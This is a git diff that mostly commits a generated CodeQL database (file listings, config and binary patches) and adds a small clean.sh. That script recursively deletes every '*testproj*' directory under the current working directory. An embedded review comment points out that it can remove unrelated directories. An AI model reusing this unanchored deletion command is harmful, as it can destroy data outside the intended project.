db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 
db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TContent create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TContent#0#s create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 
db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#1#t create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 db/db-yaml/default/cache/pages/01.pack create mode 100644 db/db-yaml/default/cache/pages/01.pack.d create mode 100644 db/db-yaml/default/cache/pages/02.pack create mode 100644 db/db-yaml/default/cache/pages/08.pack create mode 100644 db/db-yaml/default/cache/pages/09.pack create mode 100644 db/db-yaml/default/cache/pages/09.pack.d create mode 100644 db/db-yaml/default/cache/pages/0b.pack create mode 100644 db/db-yaml/default/cache/pages/0b.pack.d create mode 100644 db/db-yaml/default/cache/pages/0d.pack create mode 100644 db/db-yaml/default/cache/pages/17.pack create mode 100644 db/db-yaml/default/cache/pages/17.pack.d create mode 100644 db/db-yaml/default/cache/pages/20.pack create mode 100644 db/db-yaml/default/cache/pages/20.pack.d create mode 100644 db/db-yaml/default/cache/pages/24.pack create mode 100644 db/db-yaml/default/cache/pages/24.pack.d create mode 100644 db/db-yaml/default/cache/pages/26.pack create mode 100644 db/db-yaml/default/cache/pages/26.pack.d create mode 100644 db/db-yaml/default/cache/pages/27.pack create 
mode 100644 db/db-yaml/default/cache/pages/27.pack.d create mode 100644 db/db-yaml/default/cache/pages/29.pack create mode 100644 db/db-yaml/default/cache/pages/2b.pack create mode 100644 db/db-yaml/default/cache/pages/2d.pack create mode 100644 db/db-yaml/default/cache/pages/33.pack create mode 100644 db/db-yaml/default/cache/pages/33.pack.d create mode 100644 db/db-yaml/default/cache/pages/37.pack create mode 100644 db/db-yaml/default/cache/pages/37.pack.d create mode 100644 db/db-yaml/default/cache/pages/3c.pack create mode 100644 db/db-yaml/default/cache/pages/3c.pack.d create mode 100644 db/db-yaml/default/cache/pages/42.pack create mode 100644 db/db-yaml/default/cache/pages/42.pack.d create mode 100644 db/db-yaml/default/cache/pages/45.pack create mode 100644 db/db-yaml/default/cache/pages/45.pack.d create mode 100644 db/db-yaml/default/cache/pages/46.pack create mode 100644 db/db-yaml/default/cache/pages/4c.pack create mode 100644 db/db-yaml/default/cache/pages/4c.pack.d create mode 100644 db/db-yaml/default/cache/pages/4d.pack create mode 100644 db/db-yaml/default/cache/pages/4d.pack.d create mode 100644 db/db-yaml/default/cache/pages/4e.pack create mode 100644 db/db-yaml/default/cache/pages/4e.pack.d create mode 100644 db/db-yaml/default/cache/pages/54.pack create mode 100644 db/db-yaml/default/cache/pages/55.pack create mode 100644 db/db-yaml/default/cache/pages/5d.pack create mode 100644 db/db-yaml/default/cache/pages/62.pack create mode 100644 db/db-yaml/default/cache/pages/6a.pack create mode 100644 db/db-yaml/default/cache/pages/6f.pack create mode 100644 db/db-yaml/default/cache/pages/6f.pack.d create mode 100644 db/db-yaml/default/cache/pages/7a.pack create mode 100644 db/db-yaml/default/cache/pages/7a.pack.d create mode 100644 db/db-yaml/default/cache/pages/7b.pack create mode 100644 db/db-yaml/default/cache/pages/7b.pack.d create mode 100644 db/db-yaml/default/cache/pages/84.pack create mode 100644 db/db-yaml/default/cache/pages/84.pack.d create 
mode 100644 db/db-yaml/default/cache/pages/88.pack create mode 100644 db/db-yaml/default/cache/pages/88.pack.d create mode 100644 db/db-yaml/default/cache/pages/93.pack create mode 100644 db/db-yaml/default/cache/pages/96.pack create mode 100644 db/db-yaml/default/cache/pages/96.pack.d create mode 100644 db/db-yaml/default/cache/pages/9e.pack create mode 100644 db/db-yaml/default/cache/pages/9e.pack.d create mode 100644 db/db-yaml/default/cache/pages/a1.pack create mode 100644 db/db-yaml/default/cache/pages/a3.pack create mode 100644 db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 db/db-yaml/default/cache/pages/aa.pack create mode 100644 db/db-yaml/default/cache/pages/aa.pack.d create mode 100644 db/db-yaml/default/cache/pages/b5.pack create mode 100644 db/db-yaml/default/cache/pages/bd.pack create mode 100644 db/db-yaml/default/cache/pages/c2.pack create mode 100644 db/db-yaml/default/cache/pages/d0.pack create mode 100644 db/db-yaml/default/cache/pages/d0.pack.d create mode 100644 db/db-yaml/default/cache/pages/d5.pack create mode 100644 db/db-yaml/default/cache/pages/d6.pack create mode 100644 db/db-yaml/default/cache/pages/d6.pack.d create mode 100644 db/db-yaml/default/cache/pages/d7.pack create mode 100644 db/db-yaml/default/cache/pages/d7.pack.d create mode 100644 db/db-yaml/default/cache/pages/df.pack create mode 100644 db/db-yaml/default/cache/pages/e1.pack create mode 100644 db/db-yaml/default/cache/pages/e9.pack create mode 100644 db/db-yaml/default/cache/pages/e9.pack.d create mode 100644 db/db-yaml/default/cache/pages/f3.pack create mode 100644 db/db-yaml/default/cache/pages/f3.pack.d create mode 100644 db/db-yaml/default/cache/pages/f6.pack create mode 100644 db/db-yaml/default/cache/pages/fc.pack create mode 100644 db/db-yaml/default/cache/pages/fc.pack.d create mode 100644 db/db-yaml/default/cache/pages/fd.pack create mode 100644 db/db-yaml/default/cache/predicates/00.pack create mode 100644 db/db-yaml/default/cache/predicates/01.pack 
create mode 100644 db/db-yaml/default/cache/predicates/02.pack create mode 100644 db/db-yaml/default/cache/predicates/04.pack create mode 100644 db/db-yaml/default/cache/predicates/06.pack create mode 100644 db/db-yaml/default/cache/predicates/07.pack create mode 100644 db/db-yaml/default/cache/predicates/08.pack create mode 100644 db/db-yaml/default/cache/predicates/09.pack create mode 100644 db/db-yaml/default/cache/predicates/18.pack create mode 100644 db/db-yaml/default/cache/predicates/1b.pack create mode 100644 db/db-yaml/default/cache/predicates/1c.pack create mode 100644 db/db-yaml/default/cache/predicates/1f.pack create mode 100644 db/db-yaml/default/cache/predicates/22.pack create mode 100644 db/db-yaml/default/cache/predicates/24.pack create mode 100644 db/db-yaml/default/cache/predicates/25.pack create mode 100644 db/db-yaml/default/cache/predicates/26.pack create mode 100644 db/db-yaml/default/cache/predicates/27.pack create mode 100644 db/db-yaml/default/cache/predicates/28.pack create mode 100644 db/db-yaml/default/cache/predicates/29.pack create mode 100644 db/db-yaml/default/cache/predicates/2a.pack create mode 100644 db/db-yaml/default/cache/predicates/2d.pack create mode 100644 db/db-yaml/default/cache/predicates/2e.pack create mode 100644 db/db-yaml/default/cache/predicates/2f.pack create mode 100644 db/db-yaml/default/cache/predicates/32.pack create mode 100644 db/db-yaml/default/cache/predicates/3a.pack create mode 100644 db/db-yaml/default/cache/predicates/3c.pack create mode 100644 db/db-yaml/default/cache/predicates/42.pack create mode 100644 db/db-yaml/default/cache/predicates/48.pack create mode 100644 db/db-yaml/default/cache/predicates/49.pack create mode 100644 db/db-yaml/default/cache/predicates/4c.pack create mode 100644 db/db-yaml/default/cache/predicates/4e.pack create mode 100644 db/db-yaml/default/cache/predicates/55.pack create mode 100644 db/db-yaml/default/cache/predicates/57.pack create mode 100644 
db/db-yaml/default/cache/predicates/58.pack create mode 100644 db/db-yaml/default/cache/predicates/59.pack create mode 100644 db/db-yaml/default/cache/predicates/5a.pack create mode 100644 db/db-yaml/default/cache/predicates/5f.pack create mode 100644 db/db-yaml/default/cache/predicates/60.pack create mode 100644 db/db-yaml/default/cache/predicates/62.pack create mode 100644 db/db-yaml/default/cache/predicates/65.pack create mode 100644 db/db-yaml/default/cache/predicates/68.pack create mode 100644 db/db-yaml/default/cache/predicates/69.pack create mode 100644 db/db-yaml/default/cache/predicates/6c.pack create mode 100644 db/db-yaml/default/cache/predicates/6f.pack create mode 100644 db/db-yaml/default/cache/predicates/72.pack create mode 100644 db/db-yaml/default/cache/predicates/73.pack create mode 100644 db/db-yaml/default/cache/predicates/74.pack create mode 100644 db/db-yaml/default/cache/predicates/75.pack create mode 100644 db/db-yaml/default/cache/predicates/77.pack create mode 100644 db/db-yaml/default/cache/predicates/7a.pack create mode 100644 db/db-yaml/default/cache/predicates/7b.pack create mode 100644 db/db-yaml/default/cache/predicates/7c.pack create mode 100644 db/db-yaml/default/cache/predicates/7d.pack create mode 100644 db/db-yaml/default/cache/predicates/7e.pack create mode 100644 db/db-yaml/default/cache/predicates/82.pack create mode 100644 db/db-yaml/default/cache/predicates/86.pack create mode 100644 db/db-yaml/default/cache/predicates/87.pack create mode 100644 db/db-yaml/default/cache/predicates/88.pack create mode 100644 db/db-yaml/default/cache/predicates/89.pack create mode 100644 db/db-yaml/default/cache/predicates/8d.pack create mode 100644 db/db-yaml/default/cache/predicates/8f.pack create mode 100644 db/db-yaml/default/cache/predicates/91.pack create mode 100644 db/db-yaml/default/cache/predicates/95.pack create mode 100644 db/db-yaml/default/cache/predicates/97.pack create mode 100644 db/db-yaml/default/cache/predicates/98.pack 
create mode 100644 db/db-yaml/default/cache/predicates/99.pack create mode 100644 db/db-yaml/default/cache/predicates/9c.pack create mode 100644 db/db-yaml/default/cache/predicates/9d.pack create mode 100644 db/db-yaml/default/cache/predicates/9e.pack create mode 100644 db/db-yaml/default/cache/predicates/a0.pack create mode 100644 db/db-yaml/default/cache/predicates/a2.pack create mode 100644 db/db-yaml/default/cache/predicates/a4.pack create mode 100644 db/db-yaml/default/cache/predicates/a8.pack create mode 100644 db/db-yaml/default/cache/predicates/a9.pack create mode 100644 db/db-yaml/default/cache/predicates/aa.pack create mode 100644 db/db-yaml/default/cache/predicates/ad.pack create mode 100644 db/db-yaml/default/cache/predicates/ae.pack create mode 100644 db/db-yaml/default/cache/predicates/b0.pack create mode 100644 db/db-yaml/default/cache/predicates/b2.pack create mode 100644 db/db-yaml/default/cache/predicates/b5.pack create mode 100644 db/db-yaml/default/cache/predicates/b8.pack create mode 100644 db/db-yaml/default/cache/predicates/bd.pack create mode 100644 db/db-yaml/default/cache/predicates/c1.pack create mode 100644 db/db-yaml/default/cache/predicates/c4.pack create mode 100644 db/db-yaml/default/cache/predicates/ca.pack create mode 100644 db/db-yaml/default/cache/predicates/cb.pack create mode 100644 db/db-yaml/default/cache/predicates/cc.pack create mode 100644 db/db-yaml/default/cache/predicates/cd.pack create mode 100644 db/db-yaml/default/cache/predicates/d2.pack create mode 100644 db/db-yaml/default/cache/predicates/d5.pack create mode 100644 db/db-yaml/default/cache/predicates/d8.pack create mode 100644 db/db-yaml/default/cache/predicates/dc.pack create mode 100644 db/db-yaml/default/cache/predicates/de.pack create mode 100644 db/db-yaml/default/cache/predicates/df.pack create mode 100644 db/db-yaml/default/cache/predicates/e0.pack create mode 100644 db/db-yaml/default/cache/predicates/e3.pack create mode 100644 
db/db-yaml/default/cache/predicates/e4.pack create mode 100644 db/db-yaml/default/cache/predicates/e6.pack create mode 100644 db/db-yaml/default/cache/predicates/ec.pack create mode 100644 db/db-yaml/default/cache/predicates/ed.pack create mode 100644 db/db-yaml/default/cache/predicates/ee.pack create mode 100644 db/db-yaml/default/cache/predicates/f0.pack create mode 100644 db/db-yaml/default/cache/predicates/f2.pack create mode 100644 db/db-yaml/default/cache/predicates/f3.pack create mode 100644 db/db-yaml/default/cache/predicates/f6.pack create mode 100644 db/db-yaml/default/cache/predicates/f7.pack create mode 100644 db/db-yaml/default/cache/predicates/fa.pack create mode 100644 db/db-yaml/default/cache/predicates/fb.pack create mode 100644 db/db-yaml/default/cache/predicates/fc.pack create mode 100644 db/db-yaml/default/cache/predicates/ff.pack create mode 100644 db/db-yaml/default/cache/relations/07.pack create mode 100644 db/db-yaml/default/cache/relations/0a.pack create mode 100644 db/db-yaml/default/cache/relations/0c.pack create mode 100644 db/db-yaml/default/cache/relations/0d.pack create mode 100644 db/db-yaml/default/cache/relations/12.pack create mode 100644 db/db-yaml/default/cache/relations/13.pack create mode 100644 db/db-yaml/default/cache/relations/14.pack create mode 100644 db/db-yaml/default/cache/relations/19.pack create mode 100644 db/db-yaml/default/cache/relations/1d.pack create mode 100644 db/db-yaml/default/cache/relations/1e.pack create mode 100644 db/db-yaml/default/cache/relations/22.pack create mode 100644 db/db-yaml/default/cache/relations/2b.pack create mode 100644 db/db-yaml/default/cache/relations/32.pack create mode 100644 db/db-yaml/default/cache/relations/35.pack create mode 100644 db/db-yaml/default/cache/relations/52.pack create mode 100644 db/db-yaml/default/cache/relations/5a.pack create mode 100644 db/db-yaml/default/cache/relations/60.pack create mode 100644 db/db-yaml/default/cache/relations/65.pack create mode 100644 
db/db-yaml/default/cache/relations/6e.pack create mode 100644 db/db-yaml/default/cache/relations/71.pack create mode 100644 db/db-yaml/default/cache/relations/73.pack create mode 100644 db/db-yaml/default/cache/relations/76.pack create mode 100644 db/db-yaml/default/cache/relations/78.pack create mode 100644 db/db-yaml/default/cache/relations/81.pack create mode 100644 db/db-yaml/default/cache/relations/86.pack create mode 100644 db/db-yaml/default/cache/relations/8a.pack create mode 100644 db/db-yaml/default/cache/relations/92.pack create mode 100644 db/db-yaml/default/cache/relations/9a.pack create mode 100644 db/db-yaml/default/cache/relations/9d.pack create mode 100644 db/db-yaml/default/cache/relations/a9.pack create mode 100644 db/db-yaml/default/cache/relations/aa.pack create mode 100644 db/db-yaml/default/cache/relations/ac.pack create mode 100644 db/db-yaml/default/cache/relations/b3.pack create mode 100644 db/db-yaml/default/cache/relations/b4.pack create mode 100644 db/db-yaml/default/cache/relations/b6.pack create mode 100644 db/db-yaml/default/cache/relations/b8.pack create mode 100644 db/db-yaml/default/cache/relations/bf.pack create mode 100644 db/db-yaml/default/cache/relations/c4.pack create mode 100644 db/db-yaml/default/cache/relations/c7.pack create mode 100644 db/db-yaml/default/cache/relations/ca.pack create mode 100644 db/db-yaml/default/cache/relations/cd.pack create mode 100644 db/db-yaml/default/cache/relations/d1.pack create mode 100644 db/db-yaml/default/cache/relations/d6.pack create mode 100644 db/db-yaml/default/cache/relations/dc.pack create mode 100644 db/db-yaml/default/cache/relations/e3.pack create mode 100644 db/db-yaml/default/cache/relations/ee.pack create mode 100644 db/db-yaml/default/cache/relations/f1.pack create mode 100644 db/db-yaml/default/cache/relations/f7.pack create mode 100644 db/db-yaml/default/cache/relations/f9.pack create mode 100644 db/db-yaml/default/cache/relations/fd.pack create mode 100644 
db/db-yaml/default/cache/version create mode 100644 db/db-yaml/default/containerparent.rel create mode 100644 db/db-yaml/default/containerparent.rel.checksum create mode 100644 db/db-yaml/default/files.rel create mode 100644 db/db-yaml/default/files.rel.checksum create mode 100644 db/db-yaml/default/folders.rel create mode 100644 db/db-yaml/default/folders.rel.checksum create mode 100644 db/db-yaml/default/locations_default.rel create mode 100644 db/db-yaml/default/locations_default.rel.checksum create mode 100644 db/db-yaml/default/pools/0/buckets/info create mode 100644 db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 db/db-yaml/default/pools/0/info create mode 100644 db/db-yaml/default/pools/0/metadata/info create mode 100644 db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/pools/1/buckets/info create mode 100644 db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 db/db-yaml/default/pools/1/ids1/info create mode 100644 db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 db/db-yaml/default/pools/1/indices1/info create mode 100644 db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 db/db-yaml/default/pools/1/info create mode 100644 db/db-yaml/default/pools/1/metadata/info create mode 100644 db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 db/db-yaml/default/pools/poolInfo create mode 100644 db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 db/db-yaml/default/yaml.rel create mode 100644 db/db-yaml/default/yaml.rel.checksum create 
mode 100644 db/db-yaml/default/yaml_locations.rel create mode 100644 db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 db/db-yaml/default/yaml_scalars.rel create mode 100644 db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 db/db-yaml/yaml.dbscheme create mode 100644 db/diagnostic/cli-diagnostics-add-20240301T120559.348Z.json create mode 100644 db/diagnostic/cli-diagnostics-add-20240301T120600.004Z.json create mode 100644 db/log/database-create-20240301.130558.279.log create mode 100644 db/log/database-index-files-20240301.130558.974.log create mode 100644 db/src.zip delete mode 100644 ql/lib/codeql/actions/ast/internal/Actions.qll delete mode 100644 ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml
diff --git a/clean.sh b/clean.sh
new file mode 100755
index 000000000000..e0458a639e36
--- /dev/null
+++ b/clean.sh
@@ -0,0 +1,2 @@
+#! /bin/bash
+find . -type d -name "*testproj*" -exec rm -r {} +
diff --git a/db/baseline-info.json b/db/baseline-info.json
new file mode 100644
index 000000000000..9e26dfeeb6e6
--- /dev/null
+++ b/db/baseline-info.json
@@ -0,0 +1 @@
+{}
\ No newline at end of file
diff --git a/db/codeql-database.yml b/db/codeql-database.yml
new file mode 100644
index 000000000000..b4f4f83a0bcd
--- /dev/null
+++ b/db/codeql-database.yml
@@ -0,0 +1,10 @@
+---
+sourceLocationPrefix: /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094
+baselineLinesOfCode: 0
+unicodeNewlines: false
+columnKind: utf16
+primaryLanguage: yaml
+creationMetadata:
+ cliVersion: 2.16.3
+ creationTime: 2024-03-01T12:05:58.598849Z
+finalised: true
diff --git a/db/db-yaml/default/cache/.lock b/db/db-yaml/default/cache/.lock
new file mode 100644
index 000000000000..e69de29bb2d1
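Review bot: The `find . -type d -name "*testproj*" -exec rm -r {} +` line in clean.sh removes every matching directory without `-prune`, so find still walks into the subtrees of directories it has already queued for deletion, which is wasted work and, depending on when the batched `rm` fires, may surface "No such file or directory" noise. It also operates on whatever the caller's current directory happens to be rather than the repository root, so running it from elsewhere deletes unrelated `*testproj*` directories. I would anchor it with `cd "$(dirname "$0")" || exit 1` before the find and change the find to `find . -type d -name "*testproj*" -prune -exec rm -r -- {} +`. Adding `set -eu` after the shebang would also stop a failed `cd` from falling through to the deletion.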
diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/db/db-yaml/default/cache/cached-strings/pools/0/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..18730c0fde8bff9360316792e7fc624a0eb11b31 GIT binary patch literal 40 dcmZQz00Tw{#Q>$5|AY9)YVE5*G-qVtPXH3@7D!>5*2sBPtw$_u9AwYltfm;Rgt;O}83iN3b2Q`kR1PBn= q7WlR=ynCQ6yfzkgteh7p=PPJHfB*pk1PBlyK!5-N0t5&U2nBv=1^^uZ literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/db/db-yaml/default/cache/cached-strings/pools/0/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..cdc1fce921e1ec68dee4f29b72b971f0fdb4b568 GIT binary patch literal 40 dcmZQz00Tw{#Q>!l|AY8qIiasXbR^@!VgM!p1XBP2 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..beddaa49503d6dec5c59de7ecc00a9708acf7cb5 GIT binary patch literal 8192 zcmeIvu?@f=5CcG@?7tpUB#>;7mexWbild_V$LL&&vrFK)b|uM41)6SBvS_|e`1Xn2 z=#z$Hfmb)N*~*1`=;IsiD>J=KfB*pk1PBlyK!5-N0t5&UAV7cs0RjXFoF(uBW0VGi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/db/db-yaml/default/cache/cached-strings/pools/0/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..58e30ec6a2083023e4053ebcf641455326100eed GIT binary patch literal 40 dcmZQz00Tw{#Q>!l|AY987KiD8==$?#g#jx11o!{| literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..192298b641249e0a6510b5651c13ac89edb888c0 GIT binary patch literal 8192 zcmeIuF$%yi2nEojN!$D1xEaOGB?S7M6uv00HML7%>^kI5SzwkoEK~$~C7iN%nvLfO rJm_7~nL6~7rrJ)M|A@%~T literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/db/db-yaml/default/cache/cached-strings/pools/0/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..91c5a22d6a9c8b47601f5b914ac023ee18b307e8 GIT binary patch literal 40 ccmZQz00Tw{#Q>wFLHyVmSBpUO+=*um0UuWch5!Hn literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..05f3c4f61992be3e1d87d17db392618d8b233d4f GIT binary patch literal 8192 zcmeIuu?>Py7)9Zi5KtqKSeaN@V@F3rMaKXXjNuGcmM&mr2LrGH2?M;Aj!IAy2k;sl zf%3fMCjZInK4Xk=wd1Astn<5<>iAX;cXgn9qlF7U8r6HmTam z|G%@v>8Z}tTkYDo?Mux=009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~ Hf%yeKFK{SlQt|X#lguJW%>FbJn&sdk-^1a5C$5?Af z*EnDD7|x~UN1016v4*A9mdDa^>T9)by_ISD#lNGFZp+*ULx2DQ0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 